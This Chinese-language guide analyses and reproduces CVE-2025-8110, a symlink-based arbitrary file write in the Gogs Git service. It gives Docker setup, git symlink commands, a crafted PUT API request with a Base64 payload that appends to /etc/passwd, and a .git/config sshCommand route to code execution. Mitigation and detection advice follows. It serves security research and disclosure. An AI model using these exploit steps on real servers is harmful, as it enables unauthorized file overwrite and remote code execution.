CVE-2025-8110 Gogs远程命令注入漏洞分析与复现指南

漏洞概述

CVE-2025-8110是Gogs自建Git服务中的一个高危安全漏洞，属于任意文件写入漏洞，可导致远程命令执行。该漏洞存在于Gogs的文件更新机制中，允许攻击者通过符号链接文件实现任意文件覆盖。

漏洞基本信息

• 漏洞类型：任意文件写入 → 远程命令执行
• 影响组件：Gogs自助Git服务
• 危险等级：高危
• 影响版本：截至2025年12月15日，所有版本均受影响
• 受影响资产：约5万台（基于FOFA统计）

漏洞原理分析

核心漏洞点

漏洞位于internal/database/repo_editor.go文件的UpdateRepoFile函数中，具体位置在第191行：

WriteFile(name string, data []byte, perm FileMode)

该函数未对filePath参数进行充分的校验，特别是未检查目标文件是否为符号链接。

漏洞触发机制

1. 文件写入流程：当仓库发生变更时，Gogs会根据文件名写入变更后的内容到磁盘
2. 符号链接绕过：攻击者可提交指向系统关键文件的符号链接文件
3. 任意文件覆盖：通过PUT接口触发文件更新时，内容将被写入符号链接指向的实际路径

与历史漏洞关联

此漏洞与CVE-2024-55947位于相同位置，但绕过了之前的路径穿越修复措施。之前的修复仅对文件路径进行了净化处理，但未考虑符号链接情况。

环境搭建

部署环境

# 拉取Gogs Docker镜像
docker pull gogs/gogs

# 启动容器（示例参数）
docker run -d --name=gogs -p 3000:3000 -p 2022:22 gogs/gogs

初始配置

1. 访问http://localhost:3000完成安装
2. 数据库选择SQLite（简化配置）
3. 安装过程中不设置管理员账户
4. 安装完成后注册普通测试用户

漏洞利用条件

必要条件

1. 目标系统为Linux环境
2. Gogs实例开启用户注册功能
3. 攻击者能够注册普通用户账户
4. 目标启用PUT推送接口

前置准备

1. SSH密钥配置

   • 进入用户设置 → SSH密钥
   • 添加攻击机SSH公钥

2. 访问令牌生成

   • 进入用户设置 → 授权应用
   • 生成API访问令牌（用于PUT请求认证）

漏洞复现步骤

第一阶段：创建恶意仓库

1. 本地仓库初始化

mkdir malicious-repo && cd malicious-repo
git init

2. 创建符号链接文件

# 创建指向目标路径的符号链接
ln -s /tmp/pwned malicious-link

3. 配置Git远程仓库

git remote add origin ssh://git@localhost:2022/username/reponame.git

第二阶段：推送符号链接

1. 提交符号链接文件

git add malicious-link
git commit -m "Add symbolic link"
git push origin master

2. 验证推送结果
   • 在Gogs Web界面确认符号链接文件正常显示
   • 确认符号链接指向的目标路径正确

第三阶段：触发漏洞

构造PUT请求包：

PUT /repos/username/reponame/contents/malicious-link HTTP/1.1
Host: localhost:3000
Authorization: token YOUR_ACCESS_TOKEN_HERE
Content-Type: application/json

{
  "content": "ZWNobyAiSGFja2VkIiA+PiAvZXRjL3Bhc3N3ZAo=",
  "message": "Update file",
  "branch": "master"
}

关键参数说明：

• content: 恶意命令的Base64编码（示例：echo "Hacked" >> /etc/passwd）
• branch: 目标分支（默认为master）
• 文件路径：指向仓库中的符号链接文件

第四阶段：验证利用结果

1. 检查文件写入

# 进入容器检查
docker exec -it gogs /bin/sh
cat /tmp/pwned

2. RCE实现（进阶利用）
   • 覆盖.git/config文件注入恶意配置
   • 当仓库所有者执行git操作时触发命令执行
   • 示例payload：在[core]部分添加sshCommand = "恶意命令"

技术细节深入分析

符号链接在Git中的表示

Git使用特殊的tree对象表示符号链接文件：

• 模式：120000（表示符号链接）
• 内容：指向的目标路径
• Gogs能够正确解析和显示这些符号链接

漏洞调用链分析

1. PutContents函数（internal/route/api/v1/repo/contents.go）
2. 调用UpdateRepoFile函数
3. 执行WriteFile操作
4. 通过符号链接重定向写入路径

修复缺失分析

当前代码仅使用路径净化函数防止目录穿越，但未实现符号链接检查机制：

// 现有的路径净化（不足以防御符号链接）
filePath = util.Clean(filePath)

缓解措施

临时解决方案

1. 禁用用户注册：关闭任意用户注册功能
2. 网络隔离：将Gogs部署在内网环境
3. 访问控制：限制PUT接口的访问权限

根本解决方案

等待官方修复，建议的实现方式：

• 在文件写入前检查目标文件是否为符号链接
• 实现符号链接解析和验证机制
• 对写入路径进行完整性检查

检测与防护建议

攻击检测指标

1. 异常文件操作：监控对系统关键文件的写入尝试
2. 符号链接上传：检测仓库中的符号链接文件
3. API调用模式：分析异常的PUT请求模式

防护策略

1. 输入验证：严格校验文件路径参数
2. 文件系统隔离：使用容器或虚拟机隔离Gogs实例
3. 权限最小化：以低权限用户身份运行Gogs服务

参考资源

• 原始漏洞披露：Wiz Research团队
• 官方文档：Gogs GitHub仓库
• 相关CVE：CVE-2024-55947（历史类似漏洞）

注：本教学文档仅用于安全研究和教育目的，实际测试应在授权环境中进行。